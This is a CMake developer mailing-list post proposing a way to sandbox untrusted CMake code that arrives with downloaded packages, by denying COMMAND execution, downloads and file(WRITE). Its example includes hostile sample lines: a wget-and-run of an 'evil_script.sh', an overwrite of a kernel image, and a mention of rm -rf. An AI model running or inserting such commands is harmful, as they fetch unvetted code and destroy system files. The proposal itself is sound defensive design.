Hi,
I'm working on a package manager based on cmake.
And some cmake instructions are downloaded with user packages.
I'd like to have an ability to deny some cmake features in such
external untrusted insertions.
1. Disable any COMMAND invokations (in exec[ute]_command,
add_custom_command, add_custom_target etc.)
2. Disable any external_project downloads etc.
3. Disable specific cmake commands (e.g. file(WRITE ...)
4. add more potentially unsecure features here
Potential vulnerabilities are (according to previous list):
1. Invocation of 'rm -rf' command. The dir can be / in sudo or ~ in user mode.
2. Downloading of unwanted scripts. Also applicable to 1).
3. Rewriting important system files (like /boot/kernel.image...,
/lib/libc... etc)
How it can be done?
1. Set a new policy?
2,3. Add new cmake command: enable_command(cmd, {On|Off})
Example:
...
# trusted code above
set_policy(disable COMMAND) # pseudo
enable_command(file, Off)
# untrusted ON
execute_command(
COMMAND wget http://.../evil_script.sh
COMMAND ./evil_script.sh
) # will throw an error - COMMAND is denied
file(WRITE /boot/vmlinuz-4.4.0-34-generic "") # will throw an error -
file is banned
# untrusted OFF
enable_command(file, On)
set_policy(enable COMMAND) # pseudo
# trusted code below
...
What do you think?
Is it possible in the latest CMake? Or can it be added in the future?
--
Egor Pugin
--
Powered by www.kitware.com
Please keep messages on-topic and check the CMake FAQ at:
http://www.cmake.org/Wiki/CMake_FAQ
Kitware offers various services to support the CMake community. For more
information on each offering, please visit:
CMake Support: http://cmake.org/cmake/help/support.html
CMake Consulting: http://cmake.org/cmake/help/consulting.html
CMake Training Courses: http://cmake.org/cmake/help/training.html
Visit other Kitware open-source projects at
http://www.kitware.com/opensource/opensource.html
Follow this link to subscribe/unsubscribe:
http://public.kitware.com/mailman/listinfo/cmake-developers
